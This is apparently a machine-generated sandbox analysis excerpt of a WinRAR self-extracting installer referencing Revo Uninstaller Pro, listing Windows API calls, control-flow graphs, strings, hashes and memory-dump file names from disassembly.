                                                                                                                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FECC27
                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FECC38
                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 00FECC72
                                                                                                                                                                              • Part of subcall function 00FEC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00FEC8A7
                                                                                                                                                                              • Part of subcall function 00FEC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FEC8E3
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00FECC7B
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,0102CE18,00000800), ref: 00FECC96
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0102CE18), ref: 00FECCA8
                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00FECCAF
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FECCEE
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FECD00
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00FECD03
                                                                                                                                                                            • LoadIconW.USER32(00000000,00000064), ref: 00FECD1A
                                                                                                                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00FECD6B
                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 00FECD99
                                                                                                                                                                            • DeleteObject.GDI32 ref: 00FECDD8
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00FECDE4
                                                                                                                                                                            • CloseHandle.KERNEL32 ref: 00FECE23
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                                            • API String ID: 788466649-1997235929
                                                                                                                                                                            • Opcode ID: eca1adf1ecf37fe21d90ca57140ef7ae3d72a0df43c6f661e1cc26c8ba063fb3
                                                                                                                                                                            • Instruction ID: bfbc5e344edb2db2c0366db901b8e3462a7884047676e2ae5d0330bf2f306633
                                                                                                                                                                            • Opcode Fuzzy Hash: eca1adf1ecf37fe21d90ca57140ef7ae3d72a0df43c6f661e1cc26c8ba063fb3
                                                                                                                                                                            • Instruction Fuzzy Hash: D2611631900390AFD331BBA2EC49F6B3BACAB48710F040429F9C596185DBBE9D45E7A1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 978 fda2df-fda305 call fed940 981 fda379-fda382 FindNextFileW 978->981 982 fda307-fda31a FindFirstFileW 978->982 985 fda398-fda39a 981->985 986 fda384-fda392 GetLastError 981->986 983 fda3a0-fda449 call fdfab1 call fdb9b9 call fe0a81 * 3 982->983 984 fda320-fda33b call fdb32c 982->984 987 fda44e-fda461 983->987 993 fda33d-fda350 FindFirstFileW 984->993 994 fda352-fda35b GetLastError 984->994 985->983 985->987 986->985 993->983 993->994 996 fda35d-fda360 994->996 997 fda36c 994->997 996->997 999 fda362-fda365 996->999 1000 fda36e-fda374 997->1000 999->997 1002 fda367-fda36a 999->1002 1000->987 1002->1000
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA314
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA34A
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA352
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA37A
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA386
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 869497890-0
                                                                                                                                                                            • Opcode ID: 94291e3e8d27ab93a3f218a09f4f5af35b730c4accdaddaa7ab48cd55c75daa5
                                                                                                                                                                            • Instruction ID: 1c834f97587d87a78e53c612c5bd297717cbd6bd5e024e5e6dc46eb26a38320b
                                                                                                                                                                            • Opcode Fuzzy Hash: 94291e3e8d27ab93a3f218a09f4f5af35b730c4accdaddaa7ab48cd55c75daa5
                                                                                                                                                                            • Instruction Fuzzy Hash: F841B672504385AFC324EF28C8C4ADAF3EABF48350F040A2AF5D9D3201D775A954DB96
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6B14
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6B1B
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00FF6B2D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: e8ca3729eeb8aa0011142c75201f2351c70257869c4b726a5a1c810bf7e82cd6
                                                                                                                                                                            • Instruction ID: afca823d21247a2c18428dc9b675fcacdf46720f289965e537f396589c97a3a5
                                                                                                                                                                            • Opcode Fuzzy Hash: e8ca3729eeb8aa0011142c75201f2351c70257869c4b726a5a1c810bf7e82cd6
                                                                                                                                                                            • Instruction Fuzzy Hash: A1E0B63540020CABDF22AF64D94DAA83F6AEF84755F104414FB49CA132CF7ADD52EB90
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog_memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3004599000-0
                                                                                                                                                                            • Opcode ID: f4d76c82067bcbbaa71cdf75f63e1b243fc76325c63f164843ee785e5368c619
                                                                                                                                                                            • Instruction ID: 9996d5b194d432b43fbf986bcec4788b7e1630b3c0c1021ce02450d9f0f83899
                                                                                                                                                                            • Opcode Fuzzy Hash: f4d76c82067bcbbaa71cdf75f63e1b243fc76325c63f164843ee785e5368c619
                                                                                                                                                                            • Instruction Fuzzy Hash: AC823A31D04185AEDF15DF64C881BFA7BAABF05350F0C41BBE8499B342DB355A86EB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FEA5D6
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prologItemTextWindow
                                                                                                                                                                            • String ID: "%s"%s$,>$-el -s2 "-d%s" "-sp%s"$<$@$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                            • API String ID: 810644672-2243906297
                                                                                                                                                                            • Opcode ID: 4f4e79d71605a4c3736124ee48fdecd34efd185685f4f114f1bea0d8ce1df49e
                                                                                                                                                                            • Instruction ID: a1954d9f5ad3e891e4cccb378727dd4c20c41203cc63460221e60ab39a08132e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f4e79d71605a4c3736124ee48fdecd34efd185685f4f114f1bea0d8ce1df49e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6E4206719403C4BEEB32AFA1DC49FBE3B68AB05710F044059F684A61C5DBBE5D44EB62

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 255 fdfd49-fdfd6b call fed940 GetModuleHandleW 258 fdfd6d-fdfd84 GetProcAddress 255->258 259 fdfdbe-fe0025 255->259 260 fdfd96-fdfda0 GetProcAddress 258->260 261 fdfd86-fdfd93 258->261 262 fe002b-fe0036 call ff6662 259->262 263 fe00f3-fe0124 GetModuleFileNameW call fdb943 call fdfab1 259->263 260->259 264 fdfda2-fdfdb9 260->264 261->260 262->263 271 fe003c-fe0069 GetModuleFileNameW CreateFileW 262->271 276 fe0126-fe0130 call fda995 263->276 264->259 273 fe006b-fe0079 SetFilePointer 271->273 274 fe00e7-fe00ee CloseHandle 271->274 273->274 275 fe007b-fe0098 ReadFile 273->275 274->263 275->274 277 fe009a-fe00bf 275->277 281 fe013d 276->281 282 fe0132-fe0136 call fdfcfd 276->282 280 fe00dc-fe00e5 call fdf835 277->280 280->274 290 fe00c1-fe00db call fdfcfd 280->290 285 fe013f-fe0141 281->285 287 fe013b 282->287 288 fe0163-fe0185 call fdb9b9 GetFileAttributesW 285->288 289 fe0143-fe0161 CompareStringW 285->289 287->285 292 fe0187-fe018b 288->292 297 fe018f 288->297 289->288 289->292 290->280 292->276 296 fe018d 292->296 298 fe0193-fe0198 296->298 297->298 299 fe01cc-fe01ce 298->299 300 fe019a 298->300 301 fe02db-fe02e5 299->301 302 fe01d4-fe01eb call fdb98d call fda995 299->302 303 fe019c-fe01be call fdb9b9 GetFileAttributesW 300->303 313 fe01ed-fe024e call fdfcfd * 2 call fdda42 call fd3e41 call fdda42 call fe9735 302->313 314 fe0253-fe0286 call fd3e41 AllocConsole 302->314 308 fe01c8 303->308 309 fe01c0-fe01c4 303->309 308->299 309->303 311 fe01c6 309->311 311->299 320 fe02d3-fe02d5 ExitProcess 313->320 319 fe0288-fe02cd GetCurrentProcessId AttachConsole call ff2b33 GetStdHandle WriteConsoleW Sleep FreeConsole 314->319 314->320 319->320
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32 ref: 00FDFD61
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FDFD79
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FDFD9C
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FE0047
                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE005F
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FE0071
                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,010028D4,00000000), ref: 00FE0090
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00FE00E8
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FE00FE
                                                                                                                                                                            • CompareStringW.KERNEL32(00000400,00001001,01002920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00FE0158
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,010028EC,00000800,?,00000000,?,00000800), ref: 00FE0181
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,010029AC,00000800), ref: 00FE01BA
                                                                                                                                                                              • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
                                                                                                                                                                              • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FE022A
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FE0276
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • AllocConsole.KERNEL32 ref: 00FE027E
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00FE0288
                                                                                                                                                                            • AttachConsole.KERNEL32(00000000), ref: 00FE028F
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FE02B5
                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00FE02BC
                                                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 00FE02C7
                                                                                                                                                                            • FreeConsole.KERNEL32 ref: 00FE02CD
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00FE02D5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                                                                            • String ID: )$ *$$+$(,$(-$(.$4*$8)$<+$@,$@-$@.$DXGIDebug.dll$L*$P)$P,$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+$X-$`.$d*$dwmapi.dll$h)$kernel32$l,$p+$p-$t*$t.$uxtheme.dll$($+$,
                                                                                                                                                                            • API String ID: 1201351596-3107305897
                                                                                                                                                                            • Opcode ID: 13313f60454e39b9b490d0ac19fe28087978096d0adc35cdd9ada3088c21fd04
                                                                                                                                                                            • Instruction ID: 54e4df77f9dc1f4546f533d37fd79f7ca8fc5c6418bac89d3b962787772fdc22
                                                                                                                                                                            • Opcode Fuzzy Hash: 13313f60454e39b9b490d0ac19fe28087978096d0adc35cdd9ada3088c21fd04
                                                                                                                                                                            • Instruction Fuzzy Hash: 5DD192B14083849BE63ADF51C84CF9FBBE9AF85304F50491EF2C99A281CB748548DB63

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 402 fdcfd0-fdd00b call fed870 call fed940 call ff0bb8 409 fdd00d-fdd03c GetModuleFileNameW call fdb943 call fdfa89 402->409 410 fdd03e-fdd047 call fdfab1 402->410 413 fdd04c-fdd070 call fd943c call fd9768 409->413 410->413 421 fdd42d-fdd433 call fd946e 413->421 422 fdd076-fdd07e 413->422 426 fdd438-fdd449 421->426 424 fdd09c-fdd0cb call ff5030 * 2 422->424 425 fdd080-fdd098 call fe3393 * 2 422->425 435 fdd0ce-fdd0d1 424->435 436 fdd09a 425->436 437 fdd1ff-fdd222 call fd9a4c call ff2b53 435->437 438 fdd0d7-fdd0dd call fd9b57 435->438 436->424 437->421 447 fdd228-fdd243 call fd9979 437->447 442 fdd0e2-fdd109 call fd9979 438->442 448 fdd10f-fdd117 442->448 449 fdd1c8-fdd1cb 442->449 461 fdd24c-fdd25f call ff2b53 447->461 462 fdd245-fdd24a 447->462 451 fdd119-fdd121 448->451 452 fdd142-fdd14d 448->452 453 fdd1ce-fdd1f0 call fd9a4c 449->453 451->452 455 fdd123-fdd13d call ff5460 451->455 456 fdd14f-fdd15b 452->456 457 fdd178-fdd180 452->457 453->435 467 fdd1f6-fdd1f9 453->467 478 fdd13f 455->478 479 fdd1be-fdd1c6 455->479 456->457 464 fdd15d-fdd162 456->464 459 fdd1ac-fdd1b0 457->459 460 fdd182-fdd18a 457->460 459->449 469 fdd1b2-fdd1b5 459->469 460->459 468 fdd18c-fdd1a6 call ff5460 460->468 461->421 483 fdd265-fdd281 call fe0fde call ff2b4e 461->483 470 fdd284-fdd28b 462->470 464->457 466 fdd164-fdd176 call ff4da0 464->466 466->457 484 fdd1ba 466->484 467->421 467->437 468->421 468->459 469->448 474 fdd28d 470->474 475 fdd28f-fdd2b8 call fdfa56 call ff2b53 470->475 474->475 492 fdd2ba-fdd2c1 call ff2b4e 475->492 493 fdd2c6-fdd2d9 475->493 478->452 479->453 483->470 484->479 492->421 495 fdd2df-fdd2ed 493->495 496 fdd3c1-fdd3e4 call fdcb33 call ff2b4e * 2 493->496 499 fdd2f4-fdd2f9 495->499 532 fdd3fe-fdd42a call ff5030 * 2 496->532 533 fdd3e6-fdd3fc call fe3393 * 2 496->533 501 fdd2ff-fdd308 499->501 502 fdd5f5-fdd5fd 499->502 503 fdd30a-fdd30e 501->503 504 fdd314-fdd31b 501->504 505 fdd3bb-fdd3be 502->505 506 fdd603-fdd607 502->506 503->502 503->504 508 fdd508-fdd519 call fdf91a 504->508 509 fdd321-fdd346 504->509 505->496 510 fdd609-fdd60f 506->510 511 fdd657-fdd65d 506->511 534 fdd5ef-fdd5f2 508->534 535 fdd51f-fdd548 call fdfab1 call ff4e1d 508->535 515 fdd349-fdd36e call ff2b33 call ff4da0 509->515 516 fdd615-fdd61c 510->516 517 fdd3b2-fdd3b5 510->517 513 fdd65f-fdd665 511->513 514 fdd683-fdd69d call fdcb33 511->514 513->514 520 fdd667-fdd66d 513->520 537 fdd67b-fdd67e 514->537 551 fdd386 515->551 552 fdd370-fdd37a 515->552 523 fdd61e-fdd621 516->523 524 fdd643 516->524 517->499 517->505 520->517 527 fdd673-fdd67a 520->527 530 fdd63f-fdd641 523->530 531 fdd623-fdd626 523->531 536 fdd645-fdd652 524->536 527->537 530->536 539 fdd628-fdd62b 531->539 540 fdd63b-fdd63d 531->540 532->421 533->532 534->502 535->534 561 fdd54e-fdd5b5 call fe11fa call fdfa56 call fdfa2f call fdfa56 call ff4e71 535->561 536->517 546 fdd62d-fdd631 539->546 547 fdd637-fdd639 539->547 540->536 546->520 553 fdd633-fdd635 546->553 547->536 559 fdd389-fdd38d 551->559 552->551 558 fdd37c-fdd384 552->558 553->536 558->559 559->515 562 fdd38f-fdd396 559->562 595 fdd5b7-fdd5c0 561->595 596 fdd5c3-fdd5d8 561->596 564 fdd44c-fdd44f 562->564 565 fdd39c-fdd3aa call fdfa56 562->565 564->508 567 fdd455-fdd45c 564->567 572 fdd3af 565->572 570 fdd45e-fdd462 567->570 571 fdd464-fdd465 567->571 570->571 574 fdd467-fdd475 570->574 571->567 572->517 576 fdd477-fdd47a 574->576 577 fdd496-fdd4bb call fe11fa 574->577 579 fdd47c-fdd491 576->579 580 fdd493 576->580 584 fdd4bd-fdd4d9 call ff2b69 577->584 585 fdd4de-fdd4e6 577->585 579->576 579->580 580->577 584->572 588 fdd4ed-fdd503 call fdd9dc 585->588 589 fdd4e8 585->589 588->572 589->588 595->596 597 fdd5d9-fdd5e0 596->597 598 fdd5ec-fdd5ed 597->598 599 fdd5e2-fdd5e6 597->599 598->597 599->572 599->598
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FDCFD9
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FDCFFA
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FDD015
                                                                                                                                                                            • __fprintf_l.LIBCMT ref: 00FDD4FB
                                                                                                                                                                              • Part of subcall function 00FE0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FDB312,00000000,?,?,?,000304CA), ref: 00FE0FFA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                                                            • String ID: $ ,$$%s:$(&$*messages***$*messages***$8&$@%s:$H&$R$RTL$T&$a
                                                                                                                                                                            • API String ID: 4184910265-2160549561
                                                                                                                                                                            • Opcode ID: 6b3e7f834ed7ea4099b9687102399292f1f6e21e6bcde6508ef1593d30425a94
                                                                                                                                                                            • Instruction ID: 83f6c6c9d260ec399ad65d1f5ac299347337e0c3cb276258d5681dcbe0f9c116
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b3e7f834ed7ea4099b9687102399292f1f6e21e6bcde6508ef1593d30425a94
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E12E171A003099BDF25EFA4CC45BAD37AAEF45310F18012BFA4997391EB75D984EB50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FEA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
                                                                                                                                                                              • Part of subcall function 00FEA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
                                                                                                                                                                              • Part of subcall function 00FEA388: IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
                                                                                                                                                                              • Part of subcall function 00FEA388: TranslateMessage.USER32(?), ref: 00FEA3CC
                                                                                                                                                                              • Part of subcall function 00FEA388: DispatchMessageW.USER32(?), ref: 00FEA3D6
                                                                                                                                                                            • GetDlgItem.USER32(00000068,0102DE38), ref: 00FEC1A4
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00FE9D8F), ref: 00FEC1CF
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FEC1DE
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,010022E4), ref: 00FEC1E8
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FEC1FE
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FEC214
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FEC254
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FEC25E
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FEC26D
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FEC290
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,0100304C), ref: 00FEC29B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
